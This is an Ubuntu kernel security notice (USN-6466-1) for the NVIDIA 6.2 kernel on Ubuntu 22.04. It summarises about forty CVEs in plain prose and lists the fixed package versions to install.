Hyunwoo Kim discovered that the DVB Core driver in the Linux kernel  
contained a race condition during device removal, leading to a use-after-  
free vulnerability. A physically proximate attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-45886, CVE-2022-45919)

Hyunwoo Kim discovered that the Technotrend/Hauppauge USB DEC driver in the  
Linux kernel did not properly handle device removal events. A physically  
proximate attacker could use this to cause a denial of service (system  
crash). (CVE-2022-45887)

It was discovered that the NTFS file system implementation in the Linux  
kernel did not properly validate MFT flags in certain situations. An  
attacker could use this to construct a malicious NTFS image that, when  
mounted and operated on, could cause a denial of service (system crash).  
(CVE-2022-48425)

It was discovered that the IPv6 implementation in the Linux kernel  
contained a high rate of hash collisions in connection lookup table. A  
remote attacker could use this to cause a denial of service (excessive CPU  
consumption). (CVE-2023-1206)

Daniel Trujillo, Johannes Wikner, and Kaveh Razavi discovered that some AMD  
processors utilising speculative execution and branch prediction may allow  
unauthorised memory reads via a speculative side-channel attack. A local  
attacker could use this to expose sensitive information, including kernel  
memory. (CVE-2023-20569)

Jana Hofmann, Emanuele Vannacci, Cedric Fournet, Boris Kopf, and Oleksii  
Oleksenko discovered that some AMD processors could leak stale data from  
division operations in certain situations. A local attacker could possibly  
use this to expose sensitive information. (CVE-2023-20588)

It was discovered that the ARM64 KVM implementation in the Linux kernel did  
not properly restrict hypervisor memory access. An attacker in a guest VM  
could use this to execute arbitrary code in the host OS. (CVE-2023-21264)

It was discovered that the IPv6 RPL protocol implementation in the Linux  
kernel did not properly handle user-supplied data. A remote attacker could  
use this to cause a denial of service (system crash). (CVE-2023-2156)

Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver in  
the Linux kernel contained a race condition, leading to a null pointer  
dereference vulnerability. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2023-31083)

Yang Lan discovered that the GFS2 file system implementation in the Linux  
kernel could attempt to dereference a null pointer in some situations. An  
attacker could use this to construct a malicious GFS2 image that, when  
mounted and operated on, could cause a denial of service (system crash).  
(CVE-2023-3212)

Ross Lagerwall discovered that the Xen netback backend driver in the Linux  
kernel did not properly handle certain unusual packets from a  
paravirtualized network frontend, leading to a buffer overflow. An attacker  
in a guest VM could use this to cause a denial of service (host system  
crash) or possibly execute arbitrary code. (CVE-2023-34319)

Lin Ma discovered that the Netlink Transformation (XFRM) subsystem in the  
Linux kernel contained a null pointer dereference vulnerability in some  
situations. A local privileged attacker could use this to cause a denial of  
service (system crash). (CVE-2023-3772)

It was discovered that the KSMBD implementation in the Linux kernel did not  
properly validate buffer sizes in certain operations, leading to an integer  
underflow and out-of-bounds read vulnerability. A remote attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information. (CVE-2023-38427)

Chih-Yen Chang discovered that the KSMBD implementation in the Linux kernel  
did not properly validate SMB request protocol IDs, leading to a out-of-  
bounds read vulnerability. A remote attacker could possibly use this to  
cause a denial of service (system crash). (CVE-2023-38430)

Chih-Yen Chang discovered that the KSMBD implementation in the Linux kernel  
did not properly validate packet header sizes in certain situations,  
leading to an out-of-bounds read vulnerability. A remote attacker could use  
this to cause a denial of service (system crash) or possibly expose  
sensitive information. (CVE-2023-38431)

Chih-Yen Chang discovered that the KSMBD implementation in the Linux kernel  
did not properly validate command payload size, leading to a out-of-bounds  
read vulnerability. A remote attacker could possibly use this to cause a  
denial of service (system crash). (CVE-2023-38432)

It was discovered that the NFC implementation in the Linux kernel contained  
a use-after-free vulnerability when performing peer-to-peer communication  
in certain conditions. A privileged attacker could use this to cause a  
denial of service (system crash) or possibly expose sensitive information  
(kernel memory). (CVE-2023-3863)

Laurence Wit discovered that the KSMBD implementation in the Linux kernel  
did not properly validate a buffer size in certain situations, leading to  
an out-of-bounds read vulnerability. A remote attacker could use this to  
cause a denial of service (system crash) or possibly expose sensitive  
information. (CVE-2023-3865)

Laurence Wit discovered that the KSMBD implementation in the Linux kernel  
contained a null pointer dereference vulnerability when handling handling  
chained requests. A remote attacker could use this to cause a denial of  
service (system crash). (CVE-2023-3866)

It was discovered that the KSMBD implementation in the Linux kernel did not  
properly handle session setup requests, leading to an out-of-bounds read  
vulnerability. A remote attacker could use this to expose sensitive  
information. (CVE-2023-3867)

It was discovered that the bluetooth subsystem in the Linux kernel did not  
properly handle L2CAP socket release, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-40283)

It was discovered that some network classifier implementations in the Linux  
kernel contained use-after-free vulnerabilities. A local attacker could use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-4128)

It was discovered that the Siano USB MDTV receiver device driver in the  
Linux kernel did not properly handle device initialization failures in  
certain situations, leading to a use-after-free vulnerability. A physically  
proximate attacker could use this cause a denial of service (system crash).  
(CVE-2023-4132)

It was discovered that a race condition existed in the Cypress touchscreen  
driver in the Linux kernel during device removal, leading to a use-after-  
free vulnerability. A physically proximate attacker could use this to cause  
a denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-4134)

Andy Nguyen discovered that the KVM implementation for AMD processors in  
the Linux kernel with Secure Encrypted Virtualization (SEV) contained a  
race condition when accessing the GHCB page. A local attacker in a SEV  
guest VM could possibly use this to cause a denial of service (host system  
crash). (CVE-2023-4155)

It was discovered that the TUN/TAP driver in the Linux kernel did not  
properly initialize socket data. A local attacker could use this to cause a  
denial of service (system crash). (CVE-2023-4194)

Bien Pham discovered that the netfiler subsystem in the Linux kernel  
contained a race condition, leading to a use-after-free vulnerability. A  
local user could use this to cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-4244)

Maxim Suhanov discovered that the exFAT file system implementation in the  
Linux kernel did not properly check a file name length, leading to an out-  
of-bounds write vulnerability. An attacker could use this to construct a  
malicious exFAT image that, when mounted and operated on, could cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-4273)

Kyle Zeng discovered that the networking stack implementation in the Linux  
kernel did not properly validate skb object size in certain conditions. An  
attacker could use this cause a denial of service (system crash) or  
possibly execute arbitrary code. (CVE-2023-42752)

Kyle Zeng discovered that the netfiler subsystem in the Linux kernel did  
not properly calculate array offsets, leading to a out-of-bounds write  
vulnerability. A local user could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-42753)

Kyle Zeng discovered that the IPv4 Resource Reservation Protocol (RSVP)  
classifier implementation in the Linux kernel contained an out-of-bounds  
read vulnerability. A local attacker could use this to cause a denial of  
service (system crash). Please note that kernel packet classifier support  
for RSVP has been removed to resolve this vulnerability. (CVE-2023-42755)

Kyle Zeng discovered that the netfilter subsystem in the Linux kernel  
contained a race condition in IP set operations in certain situations. A  
local attacker could use this to cause a denial of service (system crash).  
(CVE-2023-42756)

Thelford Williams discovered that the Ceph file system messenger protocol  
implementation in the Linux kernel did not properly validate frame segment  
length in certain situation, leading to a buffer overflow vulnerability. A  
remote attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-44466)

Lonial Con discovered that the netfilter subsystem in the Linux kernel  
contained a memory leak when handling certain element flush operations. A  
local attacker could use this to expose sensitive information (kernel  
memory). (CVE-2023-4569)

Bing-Jhong Billy Jheng discovered that the Unix domain socket  
implementation in the Linux kernel contained a race condition in certain  
situations, leading to a use-after-free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-4622)

Budimir Markovic discovered that the qdisc implementation in the Linux  
kernel did not properly validate inner classes, leading to a use-after-free  
vulnerability. A local user could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-4623)

Alex Birnberg discovered that the netfilter subsystem in the Linux kernel  
did not properly validate register length, leading to an out-of- bounds  
write vulnerability. A local attacker could possibly use this to cause a  
denial of service (system crash). (CVE-2023-4881)

It was discovered that the Quick Fair Queueing scheduler implementation in  
the Linux kernel did not properly handle network packets in certain  
conditions, leading to a use after free vulnerability. A local attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2023-4921)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle removal of rules from chain bindings in certain  
circumstances, leading to a use-after-free vulnerability. A local attacker  
could possibly use this to cause a denial of service (system crash) or  
execute arbitrary code. (CVE-2023-5197)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-6.2.0-1011-nvidia   6.2.0-1011.11  
   linux-image-6.2.0-1011-nvidia-64k  6.2.0-1011.11  
   linux-image-nvidia-6.2          6.2.0.1011.13  
   linux-image-nvidia-64k-6.2      6.2.0.1011.13  
   linux-image-nvidia-64k-hwe-22.04  6.2.0.1011.13  
   linux-image-nvidia-hwe-22.04    6.2.0.1011.13

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6466-1  
   CVE-2022-45886, CVE-2022-45887, CVE-2022-45919, CVE-2022-48425,  
   CVE-2023-1206, CVE-2023-20569, CVE-2023-20588, CVE-2023-21264,  
   CVE-2023-2156, CVE-2023-31083, CVE-2023-3212, CVE-2023-34319,  
   CVE-2023-3772, CVE-2023-38427, CVE-2023-38430, CVE-2023-38431,  
   CVE-2023-38432, CVE-2023-3863, CVE-2023-3865, CVE-2023-3866,  
   CVE-2023-3867, CVE-2023-40283, CVE-2023-4128, CVE-2023-4132,  
   CVE-2023-4134, CVE-2023-4155, CVE-2023-4194, CVE-2023-4244,  
   CVE-2023-4273, CVE-2023-42752, CVE-2023-42753, CVE-2023-42755,  
   CVE-2023-42756, CVE-2023-44466, CVE-2023-4569, CVE-2023-4622,  
   CVE-2023-4623, CVE-2023-4881, CVE-2023-4921, CVE-2023-5197

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-nvidia-6.2/6.2.0-1011.11

Tag

#auth